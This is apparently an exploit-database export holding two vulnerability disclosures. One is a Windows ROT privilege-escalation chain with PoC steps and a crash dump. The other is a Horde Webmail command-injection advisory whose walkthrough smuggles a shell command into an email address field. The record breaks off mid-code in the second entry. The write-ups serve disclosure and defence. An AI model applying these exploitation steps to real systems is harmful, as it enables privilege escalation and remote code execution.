{"lastseen": "2018-01-05T05:13:31", "bulletinFamily": "exploit", "description": "Exploit for windows platform in category local exploits", "modified": "2017-05-17T00:00:00", "published": "2017-05-17T00:00:00", "href": "https://0day.today/exploit/description/27797", "id": "1337DAY-ID-27797", "type": "zdt", "title": "Microsoft Windows - Running Object Table Register ROTFLAGS_ALLOWANYCLIENT Privilege Escalation Explo", "sourceData": "Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1112\r\n \r\nWindows: Running Object Table Register ROTFLAGS_ALLOWANYCLIENT EoP\r\nPlatform: Windows 10 10586/14393 not tested 8.1 Update 2 or Windows 7\r\nClass: Elevation of Privilege\r\n \r\nSummary:\r\nBy setting an appropriate AppID it\u2019s possible for a normal user process to set a global ROT entry. This can be abused to elevate privileges.\r\n \r\nDescription:\r\n \r\nNOTE: I\u2019m not sure which part of this chain to really report. As far as I can tell it\u2019s pretty much all by design and fixing the initial vector seems difficult. Perhaps this is only a bug which can be fixed to prevent sandbox escapes?\r\n \r\nWhen registering an object in the ROT the default is to only expose that registration to the same user identity on the same desktop/window station. This includes preventing the same user at different ILs (such as between sandbox and normal user) from seeing the same registration. However it could be imagined that you might want to register an entry for all users/contexts so IRunningObjectTable::Register takes a grfFlags parameter with the value ROTFLAGS_ALLOWANYCLIENT which allows the ROT entry to be exposed to all users. \r\n \r\nThe description of this flag indicates it can only be used if the COM process is a Local Service or a RunAs application. In fact there\u2019s an explicit ROTFlags value for the AppID which would grant the privilege to a normal application. Quick testing proves this to be correct, a \u201cnormal\u201d application cannot expose the ROT entry to any client as RPCSS does a check that the calling process is allowed to expose the entry. However there are two clear problems with the check. Creating a RunAs COM object in the current session would typically run at the same privilege level as the caller, therefore an application which wanted to abuse this feature could inject code into that process. Secondly while it\u2019s not possible to register a per-user COM object which specifies a RunAs AppID it\u2019s possible to explicitly set the AppID when calling CoInitializeSecurity (either via the GUID or by naming your program to match one which maps to the correct AppID).\r\n \r\nTherefore in the current implementation effectively any process, including sandboxed ones should be able to register a global ROT entry. What can we do with this? The ROT is mainly used for OLE duties, for example Word and Visual Studio register entries for each document/project open. It would be nice not to rely on this, so instead I\u2019ll abuse another OLE component, which we\u2019ve seen before, the fact that LoadTypeLib will fall back to a moniker if it can\u2019t find the type library file specified.\r\n \r\nIf the file loading fails then LoadTypeLib will effectively call MkParseDisplayName on the passed in string. One of the things MPDN does is try and create a file moniker with the string passed in as an argument. File Monikers have an interesting feature, the COM libraries will check if there\u2019s a registered ROT entry for this file moniker already present, if it is instead of creating a new object it will call IRunningObjectTable::GetObject instead when binding. So as we can register a ROT entry for any user in any context we can provide our own implementation of ITypeLib running inside our process, by registering it against the path to the type library any other process which tries to open that library would instead get our spoofed one, assuming we can force the file open to fail.\r\n \r\nThis is the next key part, looking at the LoadTypeLib implementation the code calls FindTypeLib if this function fails the code will fall back to the moniker route. There\u2019s two opportunities here, firstly CreateFile is called on the path, we could cause this to fail by opening the file with no sharing mode, in theory it should fail. However in practice it doesn\u2019t most type libraries are in system location, if you don\u2019t have the possibility of write permission on the file the OS automatically applies FILE_SHARE_READ which makes it impossible to lock the file in its entirety. Also some TLBs are stored inside a DLL which is then used so this route is out. Instead the other route is more promising, VerifyIsExeOrTlb is called once the file is open to check the type of file to parse. This function tries to load the first 64 bytes and checks for magic signatures. We can cause the read to fail by using the LockFile API to put an exclusive lock on that part of the file. This also has the advantage that it doesn\u2019t affect file mappings so will also work with loaded DLLs. \r\n \r\nWe now can cause any user of a type library to get redirected to our \u201cfake\u201d one without abusing impersonation/symbolic link tricks. How can we use this to our advantage? The final trick is to abuse again the auto-generation of Stubs/Proxies from automation compatible interfaces. If we can get a more privileged process to use our type library when creating a COM stub we can cause a number of memory safety issues such as type confusion, arbitrary memory read/writes and extending the vtable to call arbitrary functions. This is an extremely powerful primitive, as long as you can find a more privileged process which uses a dual automation interface. For example the FlashBroker which is installed on every Win8+ machine is intentionally allowed to be created by sandboxed IE/Edge and uses dual interfaces with auto-generated Stubs. We could abuse for example the BrokerPrefSetExceptionDialogSize and BrokerPrefGetExceptionDialogSize to do arbitrary memory writes. This all works because the stub creation has no was of ensuring that the actual server implementation matches the generated stub (at least without full symbols) so it will blindly marshal pointers or call outside of the object's vtable.\r\n \r\nProof of Concept:\r\n \r\nI\u2019ve provided a PoC as a C# project. You need to compile it first. It fakes out the Windows Search Service\u2019s type library to modify the IGatherManagerAdmin2::GetBackoffReason method so that instead of marshaling a pointer to an integer for returning the caller can specify an arbitrary pointer value. When the method on the server side completes it will try and write a value to this address which will cause a Write AV. The Windows Search service would be ideal for abuse but many of the functions seem to require Administrator access to call. That\u2019s not to say you couldn\u2019t convert this into a full working exploit but I didn\u2019t.\r\n \r\n1) Compile the C# project. It should be compiled as a 64 bit executable.\r\n2) Restart the Windows Search service just to ensure it hasn\u2019t cached the stub previously. This probably isn\u2019t necessary but just to be certain.\r\n3) Attach a debugger to SearchIndexer.exe to catch the crash.\r\n4) Execute the PoC as a normal user (do not run under the VSHOST as the CoInitializeSecurity call will fail). You need to pass the path to the provided mssitlb.tlb file which has been modified appropriately.\r\n5) The service should crash trying to write a value to address 0x12345678\r\n \r\nCrash Dump:\r\n \r\n0:234> r\r\nrax=0000015ee04665a0 rbx=0000015ee0466658 rcx=0000015ee0466658\r\nrdx=0000000000000000 rsi=0000000000000004 rdi=0000000000000000\r\nrip=00007fff80e3a75d rsp=00000036541fdae0 rbp=00000036541fdb20\r\n r8=00000036541fd868 r9=0000015ee3bb50b0 r10=0000000000000000\r\nr11=0000000000000246 r12=0000015ee3c02988 r13=00000036541fe1c0\r\nr14=0000000012345678 r15=0000000000000000\r\niopl=0 nv up ei pl zr na po nc\r\ncs=0033 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010246\r\nMSSRCH!CGatheringManager::GetBackoffReason+0x8d:\r\n00007fff`80e3a75d 418936 mov dword ptr [r14],esi ds:00000000`12345678=????????\r\n0:234> k\r\n # Child-SP RetAddr Call Site\r\n00 00000036`541fdae0 00007fff`b416d533 MSSRCH!CGatheringManager::GetBackoffReason+0x8d\r\n01 00000036`541fdb10 00007fff`b413b0d0 RPCRT4!Invoke+0x73\r\n02 00000036`541fdb60 00007fff`b2fa479a RPCRT4!NdrStubCall2+0x430\r\n03 00000036`541fe180 00007fff`b3853c93 combase!CStdStubBuffer_Invoke+0x9a [d:\\th\\com\\combase\\ndr\\ndrole\\stub.cxx @ 1446]\r\n04 00000036`541fe1c0 00007fff`b305ccf2 OLEAUT32!CUnivStubWrapper::Invoke+0x53\r\n05 (Inline Function) --------`-------- combase!InvokeStubWithExceptionPolicyAndTracing::__l7::<lambda_b8ffcec6d47a5635f374132234a8dd15>::operator()+0x42 [d:\\th\\com\\combase\\dcomrem\\channelb.cxx @ 1805]\r\n06 00000036`541fe210 00007fff`b3001885 combase!ObjectMethodExceptionHandlingAction<<lambda_b8ffcec6d47a5635f374132234a8dd15> >+0x72 [d:\\th\\com\\combase\\dcomrem\\excepn.hxx @ 91]\r\n07 (Inline Function) --------`-------- combase!InvokeStubWithExceptionPolicyAndTracing+0x9e [d:\\th\\com\\combase\\dcomrem\\channelb.cxx @ 1808]\r\n08 00000036`541fe280 00007fff`b3006194 combase!DefaultStubInvoke+0x275 [d:\\th\\com\\combase\\dcomrem\\channelb.cxx @ 1880]\r\n09 (Inline Function) --------`-------- combase!SyncStubCall::Invoke+0x1b [d:\\th\\com\\combase\\dcomrem\\channelb.cxx @ 1934]\r\n0a (Inline Function) --------`-------- combase!SyncServerCall::StubInvoke+0x1b [d:\\th\\com\\combase\\dcomrem\\servercall.hpp @ 736]\r\n0b (Inline Function) --------`-------- combase!StubInvoke+0x297 [d:\\th\\com\\combase\\dcomrem\\channelb.cxx @ 2154]\r\n0c 00000036`541fe4a0 00007fff`b3008b47 combase!ServerCall::ContextInvoke+0x464 [d:\\th\\com\\combase\\dcomrem\\ctxchnl.cxx @ 1568]\r\n0d (Inline Function) --------`-------- combase!CServerChannel::ContextInvoke+0x83 [d:\\th\\com\\combase\\dcomrem\\ctxchnl.cxx @ 1458]\r\n0e (Inline Function) --------`-------- combase!DefaultInvokeInApartment+0x9e [d:\\th\\com\\combase\\dcomrem\\callctrl.cxx @ 3438]\r\n0f 00000036`541fe770 00007fff`b3007ccd combase!AppInvoke+0x8a7 [d:\\th\\com\\combase\\dcomrem\\channelb.cxx @ 1618]\r\n10 00000036`541fe8a0 00007fff`b300b654 combase!ComInvokeWithLockAndIPID+0xb2d [d:\\th\\com\\combase\\dcomrem\\channelb.cxx @ 2686]\r\n11 00000036`541feb30 00007fff`b40fd433 combase!ThreadInvoke+0x1724 [d:\\th\\com\\combase\\dcomrem\\channelb.cxx @ 6954]\r\n12 00000036`541fedc0 00007fff`b40fbed8 RPCRT4!DispatchToStubInCNoAvrf+0x33\r\n13 00000036`541fee10 00007fff`b40fcf04 RPCRT4!RPC_INTERFACE::DispatchToStubWorker+0x288\r\n14 00000036`541fef10 00007fff`b40f922d RPCRT4!RPC_INTERFACE::DispatchToStubWithObject+0x404\r\n15 00000036`541fefb0 00007fff`b40f9da9 RPCRT4!LRPC_SCALL::DispatchRequest+0x35d\r\n16 00000036`541ff090 00007fff`b40f64dc RPCRT4!LRPC_SCALL::HandleRequest+0x829\r\n17 00000036`541ff180 00007fff`b40f48c9 RPCRT4!LRPC_SASSOCIATION::HandleRequest+0x45c\r\n18 00000036`541ff200 00007fff`b411eaca RPCRT4!LRPC_ADDRESS::ProcessIO+0xb29\r\n19 00000036`541ff350 00007fff`b422e490 RPCRT4!LrpcIoComplete+0x10a\r\n1a 00000036`541ff3f0 00007fff`b422bc66 ntdll!TppAlpcpExecuteCallback+0x360\r\n1b 00000036`541ff4a0 00007fff`b34b8102 ntdll!TppWorkerThread+0x916\r\n1c 00000036`541ff8b0 00007fff`b425c5b4 KERNEL32!BaseThreadInitThunk+0x22\r\n1d 00000036`541ff8e0 00000000`00000000 ntdll!RtlUserThreadStart+0x34\r\n \r\nExpected Result:\r\nNot doing what ever it did.\r\n \r\nObserved Result:\r\nIt did it!\r\n \r\n \r\nProof of Concept:\r\nhttps://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/42021.zip\n\n# 0day.today [2018-01-05] #", "sourceHref": "https://0day.today/exploit/27797", "cvss": {"score": 4.4, "vector": "AV:LOCAL/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-04-02T05:26:12", "bulletinFamily": "exploit", "description": "Exploit for php platform in category web applications", "modified": "2017-04-12T00:00:00", "published": "2017-04-12T00:00:00", "href": "https://0day.today/exploit/description/27576", "id": "1337DAY-ID-27576", "title": "Horde Groupware Webmail 3 / 4 / 5 - Multiple Remote Code Execution Vulnerabilities", "type": "zdt", "sourceData": "Source: https://blogs.securiteam.com/index.php/archives/3107\r\n \r\nVulnerabilities Summary\r\nThe following advisory describes two (2) vulnerabilities found in\r\nHorde Groupware Webmail.\r\n \r\nHorde Groupware Webmail Edition is a free, enterprise ready, browser\r\nbased communication suite. Users can read, send and organize email\r\nmessages and manage and share calendars, contacts, tasks, notes,\r\nfiles, and bookmarks with the standards compliant components from the\r\nHorde Project. Horde Groupware Webmail Edition bundles the separately\r\navailable applications IMP, Ingo, Kronolith, Turba, Nag, Mnemo,\r\nGollem, and Trean.\r\n \r\nIt can be extended with any of the released Horde applications or the\r\napplications that are still in development, like a bookmark manager or\r\na file manager.\r\n \r\nAffected versions: Horde 5, 4 and 3\r\n \r\nThe vulnerabilities found in Horde Groupware Webmail are:\r\n \r\nAuthentication Remote Code Execution\r\nUnauthentication Remote Code Execution\r\n \r\nCredit\r\nAn independent security researcher has reported this vulnerability to\r\nBeyond Security\u2019s SecuriTeam Secure Disclosure program.\r\n \r\nVendor response\r\nHorde has released a patch to address the vulnerabilities.\r\n \r\nFor more information:\r\nhttps://lists.horde.org/archives/horde/Week-of-Mon-20170403/056767.html\r\n \r\nVulnerabilities Details\r\n \r\nAuthentication Remote Code Execution\r\nHorde Webmail contains a vulnerability that allows a remote attacker\r\nto execute arbitrary code with the privileges of the user who runs the\r\nweb server.\r\n \r\nFor successful attack GnuPG feature should be enabled on the target\r\nserver (path to gpg binary should be defined in $conf[gnupg][path]\r\nsetting).\r\n \r\nVulnerable code: encryptMessage() function of GPG feature.\r\n \r\nPath: /Horde/Crypt/Pgp/Backend/Binary.php:\r\n \r\n/* 416 */ public function encryptMessage($text, $params)\r\n/* 417 */ {\r\n/* \u2026 */\r\n/* 435 */ foreach (array_keys($params['recips']) as $val) {\r\n/* 436 */ $cmdline[] = '--recipient ' . $val;\r\n#! vulnerable code\r\n/* \u2026 */\r\n/* 444 */ /* Encrypt the document. */\r\n/* 445 */ $result = $this->_callGpg(\r\n/* 446 */ $cmdline,\r\n/* 447 */ 'w',\r\n/* 448 */ empty($params['symmetric']) ? null : $params['passphrase'],\r\n/* 449 */ true,\r\n/* 450 */ true\r\n/* 451 */ );\r\n \r\n$params[\u2018recips\u2019] will be added to $cmdline array and passed to _callGpg():\r\n \r\nPath: /Horde/Crypt/Pgp/Backend/Binary.php:\r\n \r\n/* 642 */ public function _callGpg(\r\n/* 643 */ $options, $mode, $input = array(), $output = false, $stderr = false,\r\n/* 644 */ $parseable = false, $verbose = false\r\n/* 645 */ )\r\n/* 646 */ {\r\n/* \u2026 */\r\n/* 675 */ $cmdline = implode(' ', array_merge($this->_gnupg, $options));\r\n/* \u2026 */\r\n/* 681 */ if ($mode == 'w') {\r\n/* 682 */ if ($fp = popen($cmdline, 'w')) { #!\r\nvulnerable code\r\n/* \u2026 */\r\n \r\nWe can see that our recipients (addresses) will be in command line\r\nthat is going to be executed. encryptMessage() function can be reached\r\nby various API, requests. For example it will be called when user try\r\nto send encrypted message.\r\n \r\nOur request for encryption and sending our message will be processed\r\nby buildAndSendMessage() method:\r\nPath: /imp/lib/Compose.php\r\n \r\n/* 733 */ public function buildAndSendMessage(\r\n/* 734 */ $body, $header, IMP_Prefs_Identity $identity, array $opts = array()\r\n/* 735 */ )\r\n/* 736 */ {\r\n/* 737 */ global $conf, $injector, $notification, $prefs, $registry, $session;\r\n/* 738 */\r\n/* 739 */ /* We need at least one recipient & RFC 2822 requires that no 8-bit\r\n/* 740 */ * characters can be in the address fields. */\r\n/* 741 */ $recip = $this->recipientList($header);\r\n/* ... */\r\n/* 793 */ /* Must encrypt & send the message one recipient at a time. */\r\n/* 794 */ if ($prefs->getValue('use_smime') &&\r\n/* 795 */ in_array($encrypt, array(IMP_Crypt_Smime::ENCRYPT,\r\nIMP_Crypt_Smime::SIGNENC))) {\r\n/* ... */\r\n/* 807 */ } else {\r\n/* 808 */ /* Can send in clear-text all at once, or PGP can encrypt\r\n/* 809 */ * multiple addresses in the same message. */\r\n/* 810 */ $msg_options['from'] = $from;\r\n/* 811 */ $save_msg = $this->_createMimeMessage($recip['list'], $body,\r\n$msg_options); #! vulnerable code\r\n \r\nIn line 741 it tries to create recipient list: Horde parsers values of\r\n\u2018to\u2019, \u2018cc\u2019, \u2018bcc\u2019 headers and creates list of Rfc822 addresses. In\r\ngeneral there are restrictions for characters in addresses but if we\r\nwill use the next format:\r\n \r\ndisplay-name <\"somemailbox\"@somedomain.com>\r\n \r\nsomemailbox will be parsed by _rfc822ParseQuotedString() method:\r\n \r\nPath: /Horde/Mail/Rfc822.php:\r\n \r\n/* 557 */ protected function _rfc822ParseQuotedString(&$str)\r\n/* 558 */ {\r\n/* 559 */ if ($this->_curr(true) != '\"') {\r\n/* 560 */ throw new Horde_Mail_Exception('Error when parsing a quoted string.');\r\n/* 561 */ }\r\n/* 563 */ while (($chr = $this->_curr(true)) !== false) {\r\n/* 564 */ switch ($chr) {\r\n/* 565 */ case '\"':\r\n/* 566 */ $this->_rfc822SkipLwsp();\r\n/* 567 */ return;\r\n/* 569 */ case \"\\n\":\r\n/* 570 */ /* Folding whitespace, remove the (CR)LF. */\r\n/* 571 */ if (substr($str, -1) == \"\\r\") {\r\n/* 572 */ $str = substr($str, 0, -1);\r\n/* 573 */ }\r\n/* 574 */ continue;\r\n/* 576 */ case '\\\\':\r\n/* 577 */ if (($chr = $this->_curr(true)) === false) {\r\n/* 578 */ break 2;\r\n/* 579 */ }\r\n/* 580 */ break;\r\n/* 581 */ }\r\n/* 583 */ $str .= $chr;\r\n/* 584 */ }\r\n/* 586 */ /* Missing trailing '\"', or partial quoted character. */\r\n/* 587 */ throw new Horde_Mail_Exception('Error when parsing a quoted string.');\r\n/* 588 */ }\r\n \r\nThere are only a few limitations:\r\n \r\nwe cannot use \u201c\r\n\\n will be deleted\r\nwe cannot use \\ at the end of our mailbox\r\n \r\nAfter creation of recipient list buildAndSendMessage() will call\r\n_createMimeMessage():\r\n \r\nPath: /imp/lib/Compose.php\r\n \r\n/* 1446 */ protected function _createMimeMessage(\r\n/* 1447 */ Horde_Mail_Rfc822_List $to, $body, array $options = array()\r\n/* 1448 */ )\r\n/* 1449 */ {\r\n/* 1450 */ global $conf, $injector, $prefs, $registry;\r\n/* ... */\r\n/* 1691 */ /* Set up the base message now. */\r\n/* 1692 */ $encrypt = empty($options['encrypt'])\r\n/* 1693 */ ? IMP::ENCRYPT_NONE\r\n/* 1694 */ : $options['encrypt'];\r\n/* 1695 */ if ($prefs->getValue('use_pgp') &&\r\n/* 1696 */ !empty($conf['gnupg']['path']) &&\r\n/* 1697 */ in_array($encrypt, array(IMP_Crypt_Pgp::ENCRYPT,\r\nIMP_Crypt_Pgp::SIGN, IMP_Crypt_Pgp::SIGNENC,\r\nIMP_Crypt_Pgp::SYM_ENCRYPT, IMP_Crypt_Pgp::SYM_SIGNENC))) {\r\n/* 1698 */ $imp_pgp = $injector->getInstance('IMP_Crypt_Pgp');\r\n/* ... */\r\n/* 1727 */ /* Do the encryption/signing requested. */\r\n/* 1728 */ try {\r\n/* 1729 */ switch ($encrypt) {\r\n/* ... */\r\n/* 1735 */ case IMP_Crypt_Pgp::ENCRYPT:\r\n/* 1736 */ case IMP_Crypt_Pgp::SYM_ENCRYPT:\r\n/* 1737 */ $to_list = clone $to;\r\n/* 1738 */ if (count($options['from'])) {\r\n/* 1739 */ $to_list->add($options['from']);\r\n/* 1740 */ }\r\n/* 1741 */ $base = $imp_pgp->IMPencryptMIMEPart($base, $to_list,\r\n($encrypt == IMP_Crypt_Pgp::SYM_ENCRYPT) ?\r\n$symmetric_passphrase : null);\r\n/* 1742 */ break;\r\n \r\nHere we can see validation (1695-1696 lines) that:\r\n \r\nCurrent user has enabled \u201cuse_pgp\u201d feature in his preferences (it is\r\nnot a problem as an attacker can edit his own preferences)\r\n$conf[\u2018gnupg\u2019][\u2018path\u2019] is not empty. This value can be edited only by\r\nadmin. So if we don\u2019t have value here our server is not vulnerable.\r\nBut if admin wants to allow users to use GPG feature he/she needs to\r\ndefine value for this config.\r\n \r\nAlso we can see that in lines 1737-1739 to our recipient list will be\r\nadded address \u201cfrom\u201d as well.\r\n \r\nPath: /imp/lib/Crypt/Pgp.php\r\n \r\n/* 584 */ public function impEncryptMimePart($mime_part,\r\n/* 585 */ Horde_Mail_Rfc822_List $addresses,\r\n/* 586 */ $symmetric = null)\r\n/* 587 */ {\r\n/* 588 */ return $this->encryptMimePart($mime_part,\r\n$this->_encryptParameters($addresses, $symmetric));\r\n/* 589 */ }\r\n \r\nBefore encryptMimePart() call Horde uses _encryptParameters()\r\n \r\nPath: /imp/lib/Crypt/Pgp.php\r\n \r\n/* 536 */ protected function _encryptParameters(Horde_Mail_Rfc822_List\r\n$addresses,\r\n/* 537 */ $symmetric)\r\n/* 538 */ {\r\n/* ... */\r\n/* 546 */ $addr_list = array();\r\n/* 548 */ foreach ($addresses as $val) {\r\n/* 549 */ /* Get the public key for the address. */\r\n/* 550 */ $bare_addr = $val->bare_address;\r\n/* 551 */ $addr_list[$bare_addr] = $this->getPublicKey($bare_addr);\r\n/* 552 */ }\r\n/* 554 */ return array('recips' => $addr_list);\r\n/* 555 */ }\r\n \r\nHorde will add to each address its Public Key. There a few source of\r\nPublic Keys:\r\n \r\nAddressBook (we will use this source)\r\nServers with Public Keys\r\n \r\nNote that Horde should be able to find Public Key for our \u201cFrom\u201d\r\naddress as well.\r\nWe can generate pair of PGP keys (https is required) or we can use the\r\nsame trick with AddressBook (we can create some contact, add any valid\r\nPublic PGP key, and add this address to default identity)\r\nencryptMimePart() will call encrypt() method\r\n \r\nPath: /Horde/Crypt/Pgp.php\r\n \r\n/* 773 */ public function encryptMIMEPart($mime_part, $params = array())\r\n/* 774 */ {\r\n/* 775 */ $params = array_merge($params, array('type' => 'message'));\r\n/* \u2026 */\r\n/* 781 */ $message_encrypt = $this->encrypt($signenc_body, $params);\r\n \r\nIt will call encryptMessage()\r\n \r\nPath: /Horde/Crypt/Pgp.php\r\n \r\n/* 554 */ public function encrypt($text, $params = array())\r\n/* 555 */ {\r\n/* 556 */ switch (isset($params['type']) ? $params['type'] : false) {\r\n/* 557 */ case 'message':\r\n/* 558 */ $error = Horde_Crypt_Translation::t(\r\n/* 559 */ \"Could not PGP encrypt message.\"\r\n/* 560 */ );\r\n/* 561 */ $func = 'encryptMessage';\r\n/* 562 */ break;\r\n/* ... */\r\n/* 586 */ $this->_initDrivers();\r\n/* 587 */\r\n/* 588 */ foreach ($this->_backends as $val) {\r\n/* 589 */ try {\r\n/* 590 */ return $val->$func($text, $params);\r\n/* 591 */ } catch (Horde_Crypt_Exception $e) {}\r\n/* 592 */ }\r\n \r\nIn conclusions:\r\nIf Horde server has enabled \u201cGnuPG feature\u201d any unprivileged user is\r\nable to execute arbitrary code.\r\n \r\nEnable GPG feature for attacker account (\u201cEnable PGP functionality?\u201d\r\ncheckbox on \u201cPGP Configure PGP encryption support.\u201d section in\r\nPrefferences->Mail page )\r\nCreate some contact in the attacker AddressBook, add any valid Public\r\nPGP key, and add this address to default identity\r\nCreate another contact in the attacker AddressBook, add any valid\r\nPublic PGP key, and change email address to some$(desired command to\r\nexecute) [email\u00a0protected]\r\nCreate a new message to some$(desired command to execute) [email\u00a0protected]\r\nChoose Encryption:PGP Encrypt Message option\r\nClick Send button\r\n \r\nAnd desired command will be executed on the Horde server.\r\n \r\nProof of Concept \u2013 Authenticated Code Execution\r\n \r\nFor Proof of Concept we can use preconfigured image of Horde server\r\nfrom Bitnami (Bitnami \u2013 \u201cEasy to use cloud images, containers, and VMs\r\nthat work on any platform\u201d):\r\n \r\nhttps://downloads.bitnami.com/files/stacks/horde/5.2.17-0/bitnami-horde-5.2.17-0-linux-ubuntu-14.04-x86_64.ova\r\n \r\nStep 1 \u2013 Login as admin (by default user:bitnami) and go to\r\nAdministration -> Configuration and choose Horde (horde). Open GnuPG\r\ntab, enter /usr/bin/gpg into $conf[gnupg][path] setting and click\r\n\u201cGenerate Horde Configuration\u201c:\r\n \r\nNow we have enabled GPG feature on our server and we can login as\r\nregular user and try to execute desired commands. But Bitnami image\r\ndoes not have installed and configured Mail server so we need to use\r\nexternal one or install it on local machine.\r\n \r\nWe will use gmail account (to be able to login to it from Horde I had\r\nto change Gmail account setting Allow less secure apps: ON).\r\n \r\nTo use external Mail server we need to change the next setting:\r\n\u201cAdministrator Panel\u201d -> \u201cConfiguration\u201d -> \u201cHorde\u201d ->\r\n\u201cAuthentication\u201d\r\n \r\nStep 2 \u2013 Configure Horde web-mail authentication ($conf[auth][driver])\r\nto \u201cLet a Horde application handle authentication\u201d and click \u201cGenerate\r\nHorde Configuration\u201d:\r\n \r\nStep 3 \u2013 logout and login with your gmail account. Currently we are\r\nlogin as regular user so we can try to execute desired commands:\r\n \r\nGo to Preferences -> Mail and click on PGP link. Check Enable PGP\r\nfunctionality? checkbox and click \u201cSave\u201d:\r\n \r\nCreate \u201cfrom\u201d contact in our AddressBook: \u201cAddress Book -> New Contact\r\n-> in Address Book of \u2026\u201d\r\n \r\nPersonal tab \u2013 Last Name: mymailboxwithPGPkey\r\nCommunication tab \u2013 Email: [email\u00a0protected]\r\nOther tab \u2013 PGP Public Key: any valid Public PGP key.\r\n \r\nFor example:\r\n \r\n-----BEGIN PGP PUBLIC KEY BLOCK-----\r\nVersion: SKS 1.1.6\r\nComment: Hostname: keyserver.ubuntu.com\r\nmQGiBDk89iARBADhB7AyHQ/ZBlZjRRp1/911XaXGGmq1LDLTUTCAbJyQ1TzKDdetfT9Szk01\r\nYPdAnovgzxTS89svuVHP/BiqLqhJMl2FfMLcJX+va+DujGuLDCZDHi+4czc33N3z8ArpxzPQ\r\n5bfALrpNMJi6v2gZkDQAjMoeKrNEfXLCXQbTYWCuhwCgnZZCThya4xhmlLCTkwsQdMjFoj8D\r\n/iOIP/6W27opMJgZqTHcisFPF6Kqyxe6GAftJo6ZtLEG26k2Qn3O0pghDz2Ql4aDVki3ms82\r\nz77raSqbZVJzAFPzYoIKuc3JOoxxE+SelzSzj4LuQRXYKqZzT8/qYBCLg9cmhdm8PnwE9fd/\r\nPOGnNQFMk0i2xSz0FMr9R1emIKNsA/454RHIZ39ebvZzVULS1pSo6cI7DAJFQ3ejJqEEdAbr\r\n72CW3eFUAdF+4bJQU/V69Nr+CmziBbyqKP6HfiUH9u8NLrYuK6XWXLVVSCBPsOxHxhw48hch\r\nzVxJZ5Cyo/tMSOY/CxvLL/vMoT2+kQX1SCsWALosKJyOGbpCJmPasOLKdrQnQWxpY2UgKFJl\r\nY2h0c2Fud8OkbHRpbikgPGFsaWNlQGN5Yi5vcmc+iEYEEBECAAYFAjk+IEgACgkQzDSD4hsI\r\nfQSaWQCgiDvvnRxa8XFOKy/NI7CKL5X4D28An2k9Cbh+dosXvB5zGCuQiAkLiQ+CiEYEEREC\r\nAAYFAkKTPFcACgkQCY+3LE2/Ce4l+gCdFSHqp5HQCMKSOkLodepoG0FiQuwAnR2nioCQ3A5k\r\nYI0NfUth+0QzJs1ciFYEExECABYFAjk89iAECwoEAwMVAwIDFgIBAheAAAoJEFsqCm37V5ep\r\nfpAAoJezEplLlaGQHM8ppKReVHSyGuX+AKCYwRcwJJwoQHM8p86xhSuC/opYPoheBBMRAgAW\r\nBQI5PPYgBAsKBAMDFQMCAxYCAQIXgAASCRBbKgpt+1eXqQdlR1BHAAEBfpAAoJezEplLlaGQ\r\nHM8ppKReVHSyGuX+AKCYwRcwJJwoQHM8p86xhSuC/opYPrkBDQQ5PPYqEAQArSW27DriJAFs\r\nOr+fnb3VwsYvznFfEv8NJyM/9/lDYfIROHIhdKCWswUWCgoz813RO2taJi5p8faM048Vczu/\r\nVefTzVrsvpgXUIPQoXjgnbo6UCNuLqGk6TnwdJPPNLuIZLBEhGdA+URtFOA5tSj67h0G4fo0\r\nP8xmsUXNgWVxX/MAAwUD/jUPLFgQ4ThcuUpxCkjMz+Pix0o37tOrFOU/H0cn9SHzCQKxn+iC\r\nsqZlCsR+qXNDl43vSa6Riv/aHtrD+MJLgdIVkufuBWOogtuojusnFGY73xvvM1MfbG+QaUqw\r\ngfe4UYOchLBNVtfN3WiqSPq5Yhue4m1u/xIvGGJQXvSBxNQyiEYEGBECAAYFAjk89ioACgkQ\r\nWyoKbftXl6kV5QCfV7GjnmicwJPgxUQbDMP9u5KuVcsAn3aSmYyI1u6RRlKoThh0WEHayISv\r\niE4EGBECAAYFAjk89ioAEgkQWyoKbftXl6kHZUdQRwABARXlAJ9XsaOeaJzAk+DFRBsMw/27\r\nkq5VywCfdpKZjIjW7pFGUqhOGHRYQdrIhK8=\r\n=RHjX\r\n-----END PGP PUBLIC KEY BLOCK-----\r\n \r\nClick \u201cAdd\u201d button:\r\n \r\nGo to Preferences -> Global Preferences and click on Personal\r\nInformation link. Put [email\u00a0protected] into field The default\r\ne-mail address to use with this identity and Click \u201cSave\u201d:\r\n \r\nCreate our \u201cto\u201d contact in our AddressBook: \u201cAddress Book -> New\r\nContact -> in Address Book of \u2026\u201d\r\n \r\nPersonal tab \u2013 Last Name: contact_for_attack\r\nCommunication tab \u2013 Email: [email\u00a0protected]\r\nOther tab \u2013 PGP Public Key: any valid Public PGP key (it can be the\r\nsame as in the previous step)\r\nAnd click \u201cAdd\u201d button:\r\n \r\nInject our command: Click on Edit. Go to Communication Tab, put cursor\r\nin Email field and chose \u201cInspect Element (Q)\u201d from context menu:\r\n \r\nDelete \u201cemail\u201d from the type argument and close Inspector:\r\n \r\n1\r\n<input name=\"object[email]\" id=\"object_email_\" value=\"[email\u00a0protected]\"\r\ntype=\"email\">\r\n \r\nEdit the address as we want \u2013 for example hereinj$(touch\r\n/tmp/hereisvuln)@any.com and click \u201cSave\u201d:\r\n \r\nCreate a new message ( Mail -> New Message) with our contact as recipient:\r\n \r\nChoose PGP Encrypt Message in Encryption option:\r\n \r\nEnter any subject and any content. Click \u201cSend\u201d\r\n \r\nWe will get \u201cPGP Error:\u2026\u201d\r\n \r\nIt is ok \u2013 let\u2019s check our server:\r\n \r\nWe have a new file \u201chereisvuln\u201d so our command was executed.\r\n \r\nUnauthentication Remote Code Execution\r\nHorde Webmail contains a vulnerability that allows a remote attacker\r\nto execute arbitrary code with the privileges of the user who runs the\r\nweb server.\r\n \r\nVulnerable code: decryptSignature() function of GPG feature.\r\n \r\nPath: /Horde/Crypt/Pgp/Backend/Binary.php:\r\n \r\n/* 539 */ public function decryptSignature($text, $params)\r\n/* 540 */ {\r\n/* ... */\r\n/* 550 */ /* Options for the GPG binary. */\r\n/* 551 */ $cmdline = array(\r\n/* 552 */ '--armor',\r\n/* 553 */ '--always-trust',\r\n/* 554 */ '--batch',\r\n/* 555 */ '--charset ' . (isset($params['charset']) ?\r\n$params['charset'] : 'UTF-8'),\r\n/* 556 */ $keyring,\r\n/* 557 */ '--verify'\r\n/* 558 */ );\r\n/* ... */\r\n/* 571 */ $result = 